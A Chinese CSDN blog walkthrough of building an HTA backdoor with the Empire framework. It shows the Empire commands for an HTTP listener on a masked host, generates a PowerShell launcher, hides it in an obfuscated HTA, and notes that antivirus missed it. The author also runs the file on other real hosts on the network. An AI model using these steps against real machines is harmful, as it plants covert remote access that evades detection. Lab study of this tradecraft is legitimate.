0x01 #利用Empire复现永生之火后门渗透part1

最新推荐文章于 2024-06-30 18:24:35 发布
最新推荐文章于 2024-06-30 18:24:35 发布
阅读量694 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: Empire
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Tahir_111/article/details/81301896
版权

0x01 #利用Empire复现永生之火后门渗透part1
0x1 概述
渗透测试神器Empire
Empire是一个PowerShell后期漏洞利用代理工具同时也是一款很强大的后渗透测神器,它建立在密码学、安全通信和灵活的架构之上。Empire实现了无需powershell.exe就可运行PowerShell代理的功能。快速部署后期漏洞利用模块,从键盘记录器到Mimikatz,并且能够适应通信躲避网络检测,所有的这些功能都封装在一个以实用性为重点的框架中。
1.1 渗透测试内容
本次复现内容的是博客:
永生之火后门技巧利用包六月中旬http://www.freebuf.com/column/175102.html,所述的基于Empier框架的渗透测试。通过一个hta程序安装后门,向主机发送powershell,监听http的端口,得到响应,本次渗透测试结束。
1.2 渗透测试工具准备
渗透平台工具:Vm虚拟机、Kali Liunx、win7旗舰版/win10 64位。
Empire下载地址:https://github.com/EmpireProject/Empire
Script Encoder和04dy源代码工程包:https://github.com/flagellantX/0dayplay
任意格式的图片,本次我选用的是gif图。
0x2渗透测试过程描述
2.1 Empire安装与运行
通过kali的终端,从github上克隆Empire工程(https://github.com/EmpireProject/Empire.git),再进入Empire/setup路径下,运行install.sh,进行安装。如图2.1。

图2.1
安装完成后进入Empire文件下,运行empire。如图2.2。


图2.2
2.2监听设置
(Empire) > listeners #查看本地监听代理地址。
(Empire: listeners) > uselistener http #设置监听http
(Empire: listeners/http) > set Name flagellantX #设置Name为flagellantX
(Empire: listeners/http) > set Host xxx.xxx.xxx.xxx:xx #设置监听主机和端口。如图2.3所示
(Empire: listeners/http) > execute #执行命令,将其name设置生效。如图2.4所示。
(Empire: listeners/http) > info #列出详细信息。
这里写图片描述
图2.3
这里写图片描述
图2.4
2.3准备gif图
将选好的gif图,通过在线base64转换的网址,如图2.5,转成base64格式。
这里写图片描述
图2.5
再将转好的base64代码复制到,04dy.txt的替换位置,如图2.6
这里写图片描述
图2.6
2.4返回empire得到powershell
打开kali在empire中输入: (Empire:listners)launcher powershell flagellantX,得到powershell代码,如图2.7。
这里写图片描述
图2.7
2.5合并得到最终代码.
将powershell复制到利用代码的代码段,得到最终的完整代码。如图2.8。
这里写图片描述
图2.8
2.6形成脚本
将完整的代码,用Script Encoder程序打开,选用HTML/ASP+Scripts,点击Convert。在右边框,形成脚本代码。如图2.9。
这里写图片描述
图2.9
2.7打包成可执行文件
将右边框Convert好的代码所有复制,并打包成一个可执行的文件,并做病毒扫描发现无毒。如图2.10。
这里写图片描述这里写图片描述
图2.10
2.8运行可执行文件
点击hacked.hta,如图2.11。运行文件会在kali的empire中返回响应,说明本次渗透测试成功。如图2.12
这里写图片描述
图2.11
这里写图片描述
图2.12
0x3附加渗透测试
我把hacked.hta文件,发给其他的同网段下的真实主机上运行发现,也可得到http响应。说明本次渗透具有普适性。如图3.1。
这里写图片描述
图3.1
0x4渗透测试总结
本次渗透在博客基础上,做了一个衍生发现不仅仅在windos7可以触发本次漏洞,在windos10上也可以触发,并且只要在同一网段下,就可收到http响应。初步体验了和学习了Empire框架下渗透测试的基本指令的,并且为更加深层次的渗透打下基础。

Tahir_111
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Empire之link后门维持权限
https://www.cnblogs.com/zpchcbd/
09-14 714
1.进入empire ./reset.sh 2、进去listeners设置监听器 (Empire) > listeners (Empire: listeners) > uselistener http (Empire: listeners/http) > set Name lnk (Empire: listeners/http) > execute (Empire...
Empire4.2使用-第一篇(安装、基础命令、监听器、后门生成)
Love&Share
12-13 2712
文章目录Empire4安装方法安装报错处理基本使用基础命令监听器生成后门launcher_bat木马连接主机&利用 Empire4 Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。Empire了无需powshell.exe就可运行Powershell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等,使用能够躲避内网检测喝大部分.
2024年最全Web安全 EmpireCMS漏洞常见漏洞分析及_cms代码执行漏洞(1),双非渣本网络安全四年磨一剑
2401_84263282的博客
05-05 971
我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用,当secure_file_priv = 为空,则可以写入sql语句到数据库,当secure_file_priv = NULL,则不可以往数据库里写sql语句,当secure_file_priv = /xxx,一个指定目录的时候,就只能往这个指定的目录里面写东西。漏洞原理:url地址经过Request函数处理之后,把url地址中的参数和值部分直接拼接当作a标签的href属性的值和img标签的src标签的值。
帝国cms v7.5---漏洞分析
2201_76017178的博客
05-25 6927
帝国CMS漏洞分析,解析EmpireCMSv7.5存在的漏洞以及漏洞的
Web安全 | EmpireCMS漏洞常见漏洞分析及
Javachichi的博客
03-05 1895
本文将对EmpireCMS(帝国cms)的漏洞进行分析及
#资源分享达人# 红蓝对抗之Windows内网渗透.zip
08-03
1. **信息收集**:渗透测试的第一步是收集目标网络的信息,包括IP地址范围、开放端口、服务版本、潜在的弱口令、共享文件等。这可以通过扫描工具如Nmap、masscan、Wireshark等完成。 2. **漏洞扫描**:使用漏洞扫描...
empire框架2022最新版本
06-28
Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。 Empire了无需powshell.exe就可运行Powershell代理的功能,还可以快速在...
empire-web:PowerShell Empire Web界面
05-14
PowerShell帝国Web PowerShell Empire Web利用。 它是使用的Web界面。运行Empire REST API服务器获取PowerShell Empire: : ./empire --rest --restport <port> --username <empire> --password <empire> 例如: ./...
Empire学习笔记.pdf
09-25
Empire是一款强大的、开源的 PowerShell 后渗透测试框架,由 Python 编写,主要用于网络攻防演练、红蓝对抗等安全场景。它允许安全研究人员在Windows、Linux和Mac OS平台上创建自定义的 PowerShell 模块,进行隐蔽的...
Empire:一个基于Docker和亚马逊ECS的自托管PaaS
02-26
但当我们不断壮大,问题和瓶颈频,为此我们开始寻求解决之道,首先关注的是开源社区中支持Docker的平台,如Flynn、Deis、CoreOS、Kubernetes等,但都不理想,后通过使用亚马逊ECS,最后确定了Empire,用Empire完成...
empirecms 文件上传 (CVE-2018-18086)漏洞
weixin_42675091的博客
09-02 1386
empirecms 文件上传 (CVE-2018-18086)漏洞
帝国Cms7.5后台getshell | (CVE-2018-18086)漏洞
一醉一休的博客
09-13 3212
EmpireCMS(帝国网站管理系统)是一套内容管理系统(`CMS`),EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以`实任意代码执行`,EmpireCMS7.5版本中的/e/class/moddofun.php文件的`LoadInMod函数`存在安全漏洞,攻击者可利用该漏洞上传任意文件,该漏洞编号为`CVE-2018-18086`
【漏洞-EmpireCms-文件上传】vulfocus/empirecms-cve_2018_18086
10-09 1802
EmpireCms-文件上传】帝国建站
帝国CMS(EmpireCMS)漏洞
最新发布
RMC131的博客
06-30 589
帝国网站管理系统》英文译为Empire CMS,简称Ecms,它是基于B/S结构,且功能强大而帝国CMS-logo易用的网站管理系统。帝国CMS官网:http://www.phome.net/参考相关漏洞分析文章,加上更详细的渗透测试过程。
帝国cms7.5漏洞
热门推荐
cxk
05-10 2万+
EmpireCMS v7.5后台任意代码执行分析 目录 一.漏洞简介 二.漏洞 三.原理分析 一.漏洞简介 EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实任意代码执行。 [影响版本] <=7.5 [漏洞危害] 高 [漏洞位置] /e/admin/admin/ebak/phome.php 二.漏洞 1 访问靶机192.168...
Web安全 EmpireCMS漏洞常见漏洞分析及,2024年最新三幅图给你弄懂EventBus核心原理
qq194582923的博客
04-15 1286
我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用,当secure_file_priv = 为空,则可以写入sql语句到数据库,当secure_file_priv = NULL,则不可以往数据库里写sql语句,当secure_file_priv = /xxx,一个指定目录的时候,就只能往这个指定的目录里面写东西。技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
2024年网络安全最新Web安全 EmpireCMS漏洞常见漏洞分析及_cms代码执行漏洞(1)
2401_84297899的博客
05-01 245
我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用,当secure_file_priv = 为空,则可以写入sql语句到数据库,当secure_file_priv = NULL,则不可以往数据库里写sql语句,当secure_file_priv = /xxx,一个指定目录的时候,就只能往这个指定的目录里面写东西。漏洞原理:url地址经过Request函数处理之后,把url地址中的参数和值部分直接拼接当作a标签的href属性的值和img标签的src标签的值。
Web安全 EmpireCMS漏洞常见漏洞分析及
2401_83739727的博客
04-12 756
document.write(“
Empire安装与使用教程:搭建Python2环境与反弹shell
Empire是一款强大的Post-Exploitation框架,由Python编写,主要用于网络渗透测试中的后期利用阶段。它允许渗透测试者通过PowerShell代理来远程控制目标系统,提供了多种模块,包括命令执行、信息收集、横向移动等。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值